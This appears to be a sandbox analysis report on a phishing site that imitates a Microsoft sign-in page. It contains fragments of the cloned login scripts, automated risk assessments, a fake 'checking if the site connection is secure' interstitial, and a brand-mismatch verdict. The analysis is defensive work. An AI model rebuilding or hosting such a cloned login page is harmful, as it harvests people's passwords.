RequestTimeoutInMs":10000,"startDesktopSsoOnPageLoad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"minDssoEdgeVersion":"17","isSafariAllowed":true,"redirectUri":"","isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://autologon.microsoftazuread-sso.com/common/winauth/sso/edgeredirect?client-request-id=c9d8adfb-498b-9c70-ec4b-25284edee691\u0026origin=portal365verf02.top\u0026is_redirected=1","isFlowTokenPassedInEdge":true},"iSessionPullType":2,"fUseSameSite":true,"isGlobalTenant":true,"uiflavor":1001,"fOfflineAccountVisible":false,"fEnableUserStateFix":true,"fShowAccessPassPeek":true,"fUpdateSessionPollingLogic":true,"fEnableShowPickerCredObservable":true,"fFetchSessionsSkipDsso":true,"fIsCiamUserFlowUxNewLogicEnabled":true,"fUseNonMicrosoftDefaultBrandingForCiam":true,"fRemoveCustomCss":true,"fFixUICrashForApiRequestHandler":true,"fShowUpdatedKoreanPrivacyFooter":true,"fUsePostCssHotfix":true,"fUseHighContrastDetectionMode":true,"fFixUserFlowBranding":true,"fEnablePasskeyNullFix":true,"fEnableRefreshCookiesFix":true,"urlAcmaServerPath":"https://portal365verf02.top/","sTenantId":"00000000-0000-0000-0000-000000000000","scid":1013,"hpgact":1800,"hpgid":6,"apiCanary":"PAQABDgEAAABVrSpeuWamRam2jAF1XRQEPyrJahjCxXl52NjjyqKbUbenw3dXvaCS0QvUDP0lsL3Yl8MoDeiAS4ilEQsTEESY6ewruP-4AIlnQc_ngbymrTkZ3rAn1XaSRCgpLZaVmCvOZwyDiRjfL9o0gEaUBoB83i761V2FGsr9FnQ-mD3FcgLkf4atWfCQqs8UqMCGum3_6qHdQiBeMYKWTdJXE6w-L5uJ3jEzPY11FTmvjc6_GyAA","canary":"HfknZkt5geRjrxtAgFDIf0B6sHjTnqQrF90b2wohLWY=0:1:CANARY:pOMAh2vySz4/A/yebgs6NaSmPlPKIFtHE8qFvgPe/MQ=","sCanaryTokenName":"canary","fSkipRenderingNewCanaryToken":false,"fEnableNewCsrfProtection":true,"correlationId":"c9d8adfb-498b-9c70-ec4b-25284edee691","sessionId":"38f1a944-1145-4539-82af-bd28a0700c00","locale":{"mkt":"en-US","lcid":1033},"slMaxRetry":2,"slReportFailure":true,"strings":{"desktopsso":{"authenticatingmessage":"Trying to sign you in"}},"enums":{"ClientMetricsModes":{"None":0,"SubmitOnPost":1,"SubmitOnRedirect":2,"InstrumentPlt":4}},"url
URL: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9... Model: Joe Sandbox AI	{ "risk_score": 5, "reasoning": "The provided JavaScript snippet exhibits a mix of behaviors that require further review. While it does not contain any high-risk indicators like dynamic code execution or data exfiltration, it has some moderate-risk behaviors, such as external data transmission and the use of fallback domains. Additionally, the code appears to be using obfuscated URLs, which is a concern. However, the script seems to be primarily focused on loading resources and handling errors, which could be part of a legitimate functionality. More context is needed to determine the true intent of this script." }
!function(e,r){for(var t in r)e[t]=r[t]}(this,function(e){function r(n){if(t[n])return t[n].exports;var o=t[n]={exports:{},id:n,loaded:!1};return e[n].call(o.exports,o,o.exports,r),o.loaded=!0,o.exports}var t={};return r.m=e,r.c=t,r.p="",r(0)}([function(e,r){!function(){function e(){return l.$Config\|\|l.ServerData\|\|{}}function r(e,r){var t=l.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src\|\|r.href\|\|"")+"'",e+=", id:"+(r.id\|\|""),e+=", async:"+(r.async\|\|""),e+=", defer:"+(r.defer\|\|"")),t.appendLog(e))}function t(){var e=l.$B;if(void 0===c)if(e)c=e.IE;else{var r=l.navigator.userAgent;c=r.indexOf("MSIE ")!==-1\|\|r.indexOf("Trident/")!==-1}return c}function n(){var e=l.$B;if(void 0===f)if(e)f=e.RE_Edge;else{var r=l.navigator.userAgent;f=r.indexOf("Edge")!==-1}return f}function o(e){var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t),o=e.substring(n,n+h.length).toLowerCase()===h;return o}function a(){var r=e(),t=r.loader\|\|{};return t.slReportFailure\|\|r.slReportFailure\|\|!1}function i(){var r=e(),t=r.loader\|\|{};return t.redirectToErrorPageOnLoadFailure\|\|!1}function s(){var r=e(),t=r.loader\|\|{};return t.logByThrowing\|\|!1}function d(e){if(!t()&&!n())return!1;var r=e.src\|\|e.href\|\|"";if(!r)return!0;if(o(r)){var a,i,s;try{a=e.sheet,i=a&&a.cssRules,s=!1}catch(d){s=!0}if(a&&!i&&s)return!0;if(a&&i&&0===i.length)return!0}return!1}function u(){function t(e){var r=g.getElementsByTagName("head")[0];r.appendChild(e)}function n(e,r,t,n){var d=null;return d=o(e)?a(e):"script"===n.toLowerCase()?i(e):s(e,n),r&&(d.id=r),"function"==typeof d.setAttribute&&(d.setAttribute("rickorigin","anonymous"),t&&"string"==typeof t&&d.setAttribute("xintegrity",t)),d}function a(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function i(e){var r=g.createElement("script"),t=g.querySelector("script[nononce]");if(r.type="text/javascript",r.src=e,r.defer=!1,r.async=!1,t){var n=t.nononce\|\|t.getAttribute("nononce");r.setAttribute("nononce",n)}return r}function s(e,r){var t=g.createElement(r);return t.src=e,t}function c(e,r){if(e&&e.length>0&&r)for(var t=0;t<e.length;t++)if(r.indexOf(e[t])!==-1)return!0;return!1}function f(r){var t=e();if(t.cQ){var n=c(L,r)?L:x;if(!(n&&n.length>1))return r;for(var o="https://",a=0;a<n.length;a++)if(r.indexOf(n[a])!==-1){var i=n[a+1<n.length?a+1:0],s=r.substring(n[a].length);return n[a].substring(0,o.length)!==o&&(i=o+i,s=s.substring(o.length)),i+s}return r}if(!(x&&x.length>1))return r;for(var d=0;d<x.length;d++)if(0===r.indexOf(x[d]))return x[d+1<x.length?d+1:0]+r.substring(x[d].length);return r}function l(e,t,n,o){return r("[$Loader]: "+(R.failMessage\|\|"Failed"),o),b[e].retry<y?(b[e].retry++,v(e,t,n),void u._ReportFailure(b[e].retry,b[e].srcPath)):void(n&&n())}function h(e,t,n,o){if(d(o))return l(e,t,n,o);r("[$Loader]: "+(R.successMessage\|\|"Loaded"),o),v(e+1,t,n);var a=b[e].onSuccess;"function"==typeof a&&a(b[e].srcPath)}function v(e,o,a){if(e<b.length){var i=b[e];if(!i\|\|!i.srcPath)return void v(e+1,o,a);i.retry>0&&(i.srcPath=f(i.srcPath),i.origId\|\|(i.origId=i.id),i.id=i.origId+"_Retry_"+i.retry);var s=n(i.srcPath,i.id,i.xintegrity,i.tagName);s.onload=function(){h(e,o,a,s)},s.onerror=function(){l(e,o,a,s)},s.onreadystatechange=function(){"loaded"===s.readyState?setTimeout(function(){h(e,o,a,s)},500):"complete"===s.readyState&&h(e,o,a,s)},t(s),r("[$Loader]: Loading '"+(i.srcPath\|\|"")+"', id:"+(i.id\|\|""))}else o&&o()}var p=e(),y=p.slMaxRetry\|\|2,m=p.loader\|\|{},x=m.cdnRoots\|\|[],L=m.tenantBrandingCdnRoots\|\|[],R=this,b=[];R.retryOnError=!0,R.successMessage="Loaded",R.failMessage="Error",R.Add=function(e,r,t,n,o,a){e&&b.push({srcPath:e,id:r,retry:n\|\|0,xintegrity:t,tagName:o\|\|"script",onSuccess:a})},R.AddForReload=function(e,r){var t=e.src\|\|e.href\|\|"";R.Add(t,"AddForReload",e.xintegrity,1,e.tagName,r)},R.AddIf=function(e,r,t){e&&R.Add(r,t)},R.Load=function(e,r){v(0,e,r)}}var c,f,l=window,g=l.document,h=".css";u.On=function(e,r,t){if(!e)throw"The target element must be provided and cannot be null.";r?u.OnError(e,
URL: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9... Model: Joe Sandbox AI	{ "risk_score": 3, "reasoning": "The provided JavaScript snippet appears to be a configuration object for a Microsoft login page. It contains various URLs and settings related to the login process, but does not exhibit any high-risk behaviors such as dynamic code execution, data exfiltration, or obfuscated code. The script seems to be focused on providing a functional and customizable login experience, with some moderate-risk indicators like external data transmission and fallback domains. However, these behaviors are common in legitimate login systems and can be considered low-risk in this context." }
var ServerData = {urlProfilePhoto:'',fFixUrlResetPassword:false,eCBBrandMode:2,fActivateFocusOnApprovalNumberRemoteNGC:false,fPrefixCookieDomainEnabled:false,fCBBrandShowValueProp:true,urlPostMsa:'https://login.live.com/ppsecure/post.srf?client_id=51483342-085c-4d86-bf88-cf50c7252078&cobrandid=deb3f74a-ed5b-4ef1-8d3c-92b85dd47352&contextid=6334FF2BED3296D5&opid=EE1291114D3F8478&bk=1736967981&uaid=c9d8adfb498b9c70ec4b25284edee691&pid=15216',fCBUseModernCobranding:true,fIsPasskeySupportEnabled:true,fIsBoundAccount:false,urlCBHeaderLogo:'',urlDisambigRename:'',iLoginStringsVariantId:0,fEnableClientPerf:false,iPromotedFedCredType:0,fHasError:false,fIsOtcLoginDisabled:false,fIsRemoteNGCSupported:true,urlFidoHelp:'https://go.microsoft.com/fwlink/?linkid=2013738',sCID:'',urlFooterHelp:'',fHideLoginDesc:false,fKMSIEnabled:false,sPrefSMSCountry:'US',urlManageCreds:'',urlReportPageLoad:'',sPOST_PaginatedLoginStateRNGCDefaultType:'',urlCBPartnerPreload:'',sPOST_PaginatedLoginStateRNGCEntropy:'',urlLogin:'https://login.live.com/oauth20_authorize.srf?client_id=51483342-085c-4d86-bf88-cf50c7252078&cobrandid=deb3f74a-ed5b-4ef1-8d3c-92b85dd47352&client_id=51483342-085c-4d86-bf88-cf50c7252078&cobrandid=deb3f74a-ed5b-4ef1-8d3c-92b85dd47352&contextid=6334FF2BED3296D5&opid=EE1291114D3F8478&bk=1736967981&mkt=EN-US&lc=1033&uaid=c9d8adfb498b9c70ec4b25284edee691',sPOST_PaginatedLoginStateRNGCSLK:'',fMMXQRNewDescription:true,urlFidoLogin:'https://login.microsoft.com/consumers/fido/get?mkt=EN-US&lc=1033&uiflavor=web',sProofType:'',urlFooterTOU:'https://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&mkt=EN-US&uaid=c9d8adfb498b9c70ec4b25284edee691',oWhiteLblFooterTxtTwo:{},urlChangePassword:'https://account.live.com/ChangePassword?uaid=c9d8adfb498b9c70ec4b25284edee691',urlGetCredentialType:'https://login.live.com/GetCredentialType.srf?opid=EE1291114D3F8478&id=293577&client_id=000000004417ACAE&fci=00000002-0000-0ff1-ce00-000000000000&client_id=51483342-085c-4d86-bf88-cf50c7252078&cobrandid=deb3f74a-ed5b-4ef1-8d3c-92b85dd47352&mkt=EN-US&lc=1033&uaid=c9d8adfb498b9c70ec4b25284edee691',oWhiteLblProps:{'Logo':'','LogoAltText':'','LogoText':'','ShowWLHeader':true},urlIPv6Experiment:'https://ipv6.login.live.com/ipv6.png?uaid=c9d8adfb498b9c70ec4b25284edee691',hpgid:33,sRequestCountry:'US',urlLostAuthenticator:'https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/oauth20_authorize.srf%3fclient_id%3d51483342-085c-4d86-bf88-cf50c7252078%26cobrandid%3ddeb3f74a-ed5b-4ef1-8d3c-92b85dd47352%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26cobrandid%3ddeb3f74a-ed5b-4ef1-8d3c-92b85dd47352%26uaid%3dc9d8adfb498b9c70ec4b25284edee691%26contextid%3d6334FF2BED3296D5%26opid%3dEE1291114D3F8478%26bk%3d1736967981%26login_hint%3dtest%2540test.org&id=293577&uiflavor=web&cobrandid=deb3f74a-ed5b-4ef1-8d3c-92b85dd47352&client_id=1E00004417ACAE&lostauthenticator=1&uaid=c9d8adfb498b9c70ec4b25284edee691&mkt=EN-US&lc=1033&bk=1736967981',sCBBrandSubTitle:'##li16####B##Hotmail##/B####BR##The smart way to do email - fast, easy and reliable##li8####B##Messenger##/B####BR##Stay in touch with the most important people in your life##li10####B##SkyDrive##/B####BR##Free, password-protected online storage',urlAccountQuery:'https://account.live.com/query.aspx?uaid=c9d8adfb498b9c70ec4b25284edee691&mkt=EN-US&lc=1033&id=293577',a11yConformeLink:null,urlMsaStaticMeControl:'https://login.live.com/Me.htm?v=3&uaid=c9d8adfb498b9c70ec4b25284edee691',urlPhoneLinkPrivacyTerms:'https://go.microsoft.com/fwlink/p/?linkid=850749#mainyourphonemodule&profile=transparentLight',sCBHeaderText:'',sConsumerDomains:'',fApplicationInsightsEnabled:false,urlSessionState:'https://login.live.com/GetSessionState.srf?client_id=51483342-085c-4d86-bf88-cf50c7252078&cobrandid=deb3f74a-ed5b-4ef1-8d3c-92b85dd47352&mkt=EN-US&lc=1033&uaid=c9d8adfb498b9c70ec4b25284edee691',sNetworkType:'',fUseResponsiveSizing:true,sPOST_Type:'',eCBHeaderMode:0,urlFed:'',fAllowGrayOutLightBox:true,iApplicationInsightsEnabledPercentage:
URL: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9... Model: Joe Sandbox AI	{ "risk_score": 4, "reasoning": "The script appears to be a utility function that handles script retries and tracking. It has some moderate-risk indicators, such as using `document.write` to insert scripts, which can be problematic if the script source is not properly validated. Additionally, it checks the user agent and modifies the script source based on the browser version, which could potentially be used for malicious purposes. However, the script does not exhibit any clear signs of malicious intent, and the behavior seems to be focused on ensuring the successful loading of scripts. Further review may be necessary to determine the full context and purpose of this script." }
!function(e,r){for(var t in r)e[t]=r[t]}(this,function(e){function r(n){if(t[n])return t[n].exports;var i=t[n]={exports:{},id:n,loaded:!1};return e[n].call(i.exports,i,i.exports,r),i.loaded=!0,i.exports}var t={};return r.m=e,r.c=t,r.p="",r(0)}([function(e,r){var t=window,n=t.navigator;t.g_iSRSFailed=0,t.g_sSRSSuccess="",r.SRSRetry=function(e,r,i,s,a){var o=1,c=unescape("%3Cscript type='text/javascript'");a&&(c+=" rickorigin='anonymous' xintegrity='"+a+"'"),c+=" src='";var u=unescape("'%3E%3C/script%3E"),S=r;if(n&&n.userAgent&&s&&s!==r){var d=n.userAgent.toLowerCase(),p=d.indexOf("edge")>=0;if(!p){var f=d.match(/chrome\/([0-9]+)\./),g=f&&2===f.length&&!isNaN(f[1])&&parseInt(f[1])>54;g&&(S=s)}}t.g_sSRSSuccess.indexOf(e)===-1&&("undefined"==typeof t[e]?(t.g_iSRSFailed=1,i<=o&&document.write(c+S+u)):t.g_sSRSSuccess+=e+"\|"+i+",")}}]));var g_dtFirstByte=new Date();var g_objPageMode = null;
URL: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9... Model: Joe Sandbox AI	{ "risk_score": 8, "reasoning": "This script demonstrates high-risk behavior. It attempts to redirect the user to a different domain, which could be a sign of a phishing or malicious attempt. Additionally, the use of `document.write()` with obfuscated HTML suggests the potential for injecting malicious content into the page. These behaviors are indicative of a high-risk script that should be further investigated." }
if (top != self){try{top.location.replace(self.location.href);}catch (e){}}else{document.write(unescape('%3C%73') + 'tyle type="text/css" nononce="jusXJY5XBFHj11tP9INR0mEoBD3lAU8MJpMs+DxMmSU=">body{display:block !important;}</style>');}
URL: https://portal365verf02.top/aadcdn.msauth.net/~/sh... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "This script appears to be a polyfill for the Promise API, which is a common and legitimate practice. It does not exhibit any high-risk behaviors like dynamic code execution, data exfiltration, or obfuscation. The script is well-documented and licensed under the public domain, indicating it is likely a trusted and widely-used utility. While it uses some moderate-risk practices like external data transmission and fallback domains, these are common in modern web development and do not appear to be used for malicious purposes. Overall, this script poses a low risk and is likely a benign utility." }
/! ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise. * * json2.js (2016-05-01) * https://github.com/douglascrockford/JSON-js * License: Public Domain * * Provided for Informational Purposes Only * * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------ */!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)r=i[s],Object.prototype.hasOwnProperty.call(o,r)&&o[r]&&u.push(o[r][0]),o[r]=0;for(n in a)Object.prototype.hasOwnProperty.call(a,n)&&(e[n]=a[n]);for(c&&c(t);u.length;)u.shift()()}var n,r={},o={1:0};function i(t){if(r[t])return r[t].exports;var n=r[t]={i:t,l:!1,exports:{}};return e[t].call(n.exports,n,n.exports,i),n.l=!0,n.exports}Function.prototype.bind\|\|(n=Array.prototype.slice,Function.prototype.bind=function(e){if("function"!=typeof this)throw new TypeError("Function.prototype.bind - what is trying to be bound is not callable");var t=n.call(arguments,1),r=t.length,o=this,i=function(){},a=function(){return t.length=r,t.push.apply(t,arguments),o.apply(i.prototype.isPrototypeOf(this)?this:e,t)};return this.prototype&&(i.prototype=this.prototype),a.prototype=new i,a}),document.head=document.head\|\|document.getElementsByTagName("head")[0],function(){function e(t){var n=this,r=0,o=null,i=[];function a(){if(i.length>0){var e=i.slice();i=[],setTimeout((function(){for(var t=0,n=e.length;t<n;++t)e[t]()}),0)}}function s(e){0===r&&(o=e,r=1,a())}function u(e){0===r&&(o=e,r=2,a())}n.then=function(t,n){return new e((function(s,u){!function(t,n,s,u){i.push((function(){var i;try{i=1===r?"function"==typeof t?t(o):o:"function"==typeof n?n(o):o}catch(a){return void u(a)}i instanceof e?i.then(s,u):2===r&&"function"!=typeof n?u(i):s(i)})),0!==r&&a()}(t,n,s,u)}))},n["catch"]=function(e){return n.then(null,e)},function(){if("function"!=typeof t)throw new TypeError("Promise: argument is not a Function object");try{t(s,u)}catch(e){u(e)}}()}function t(e,t,n,r,o){return function(i){e[t]=r?i:o?{status:"fulfilled",value:i}:{status:"rejected",reason:i},n()}}function n(n,r){return n&&n.length?new e((function(o,i){for(var a=[],s=0,u=0,c=n.length;u<c;++u){var l=n[u];if(l instanceof e){s++;var d=function(){0==--s&&o(a)};r?l.then(t(a,u,d,r),i):l.then(t(a,u,d,r,!0),t(a,u,d,r,!1))}else a[u]=l}0===s&&setTimeout((function(){o(a)}),0)})):e.resolve([])}function r(e,t){return function(){e(t)}}e.all=function(e){return n(e,!0)},e.allSettled=function(e){return n(e,!1)},e.race=function(t){return new e((function(n,o){if(t&&t.length)for(var i=0,a=t.length;i<a;++i){var s=t[i];s instanceof e?s.then(n,o):setTimeout(r(n,s),0)}}))},e.reject=function(t){return new e((function(e,n){n(t)}))},e.resolve=function(t){return t instanceof e?t:t&&"function"==typeof t.then?new e((function(e,n){t.then(e,n)})):new e((function(e){e(t)}))},window.Promise\|\|(window.Promise=e),window.Promise.all\|\|(window.Promise.all=e.all),window.Promise.allSettled\|\|(window.Promise.allSettled=e.allSettled),window.Promise.race\|\|(window.Promise.race=e.race),window.Promise.reject\|\|(window.Promise.reject=e.reject),window.Promise.resolve\|\|(window.Promise.resolve=e.resolve)}(),i.e=function(e){var t=[],n=o[e];if(0!==n)if(n)t.push(n[2]);else{var r=new Promise((function(t,r){n=o[e]=[t,r]}));t.push(n[2]=r);var a=window.ServerData,s=a&&a.loader&&a.loader.cdnRoots\|\|[],u=a&&a.slMaxRetry?a.slMaxRetry:s.length-1,c=new Error;var l=function d(t,n){var
URL: https://52f1897b.5648702dd4d5255cab645104.workers.dev/?qrc=test@test.org Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://52f1897b.5648702dd4d5255cab645104.workers.dev/?qrc=test@test.org Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Please stand by, while we are checking if the site connection is secure\nWe need to review the security of your connection before proceeding.", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://52f1897b.5648702dd4d5255cab645104.workers.dev/?qrc=test@test.org Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: https://52f1897b.5648702dd4d5255cab645104.workers.dev/?qrc=test@test.org Model: Joe Sandbox AI	{ "brands": [ "Cloudflare" ] }
	{ "brands": [ "Cloudflare" ] }
URL: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9... Model: Joe Sandbox AI	```json { "risk_score": 2, "reasoning": "The script includes moderate-risk indicators such as aggressive DOM manipulation and error reporting to third-party domains. However, there are no high-risk behaviors like dynamic code execution or data exfiltration. The script appears to be part of a debugging or logging framework, which aligns with legitimate use cases, reducing the overall risk." }
//<![CDATA[ !function(){var e=window,r=e.$Debug=e.$Debug\|\|{},t=e.$Config\|\|{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog\|\|25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs\|\|[],u=n.$WebWatson;try{ var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r\|\|this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do\|\|(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)\|\|o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n\|\|(a=n, u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){ for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener\|\|"load"===e.type\|\|"complete"===r.readyState)&&t()}function i(){ r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){ return f.$Config\|\|f.ServerData\|\|{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src\|\|r.href\|\|"")+"'",e+=", id:"+(r.id\|\|""),e+=", async:"+(r.async\|\|""),e+=", defer:"+(r.defer\|\|"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE ")\|\|-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){ var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+v.length).toLowerCase()===v}function i(){var r=e();return(r.loader\|\|{}).slReportFailure\|\|r.slReportFailure\|\|!1}function a(){return(e().loader\|\|{}).redirectToErrorPageOnLoadFailure\|\|!1}function s(){return(e().loader\|\|{}).logByThrowing\|\|!1}function u(e){if(!t()&&!n()){return!1}var r=e.src\|\|e.href\|\|"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0} if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("rickorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("xintegrity",t)),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){ var r=g.createElement("script"),t=g.querySelector("s
URL: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2Vf Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "Sign in", "text_input_field_labels": [ "Enter password" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2Vf Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2Vf Model: Joe Sandbox AI	```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'portal365verf02.top' does not match the legitimate domain name for Microsoft.", "The domain uses a '.top' extension, which is unusual for a well-known brand like Microsoft.", "The URL contains suspicious elements such as '365' and 'verf02', which could be attempts to mimic Microsoft's Office 365 services.", "The presence of an input field for 'Enter password' is a common tactic used in phishing sites to capture sensitive information." ], "riskscore": 9} Google indexed: False
URL: portal365verf02.top Brands: Microsoft Input Fields: Enter password
URL: https://login.live.com/ppsecure/post.srf?client_id=51483342-085c-4d86-bf88-cf50c7252078&cobrandid=deb3f74a-ed5b-4ef1-8d3c-92b85dd47352&contextid=6334FF2BED3296D5&opid=EE1291114D3F8478&bk=1736967981&uaid=c9d8adfb498b9c70ec4b25284edee691&pid=15216 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://login.live.com/ppsecure/post.srf?client_id=51483342-085c-4d86-bf88-cf50c7252078&cobrandid=deb3f74a-ed5b-4ef1-8d3c-92b85dd47352&contextid=6334FF2BED3296D5&opid=EE1291114D3F8478&bk=1736967981&uaid=c9d8adfb498b9c70ec4b25284edee691&pid=15216 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 18:05:50 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.988605961879278
Encrypted:	false
SSDEEP:	48:8n2d0OTUKfR0H80idAKZdA19ehwiZUklqehHy+3:8ntOweRyoy
MD5:	740E9B7A632FC591F1FA4EEF335AA058
SHA1:	BF56D163CC4D6F90E6EB9028AD2088E8F7FB673F
SHA-256:	72F244C42F0B72FF2710B3D1D1261858A5C8F7A7714ACF587E7121B15A222213
SHA-512:	FFB155B6B95F17D6074CC20C2158B6C149F262B0EA88B2E8ED2059CCAE3D631CB9B2F6BC5E1808E387DA7094E2146705F58F5A353820D9340BB5F3ED5AEF8F71
Malicious:	false
Reputation:	low
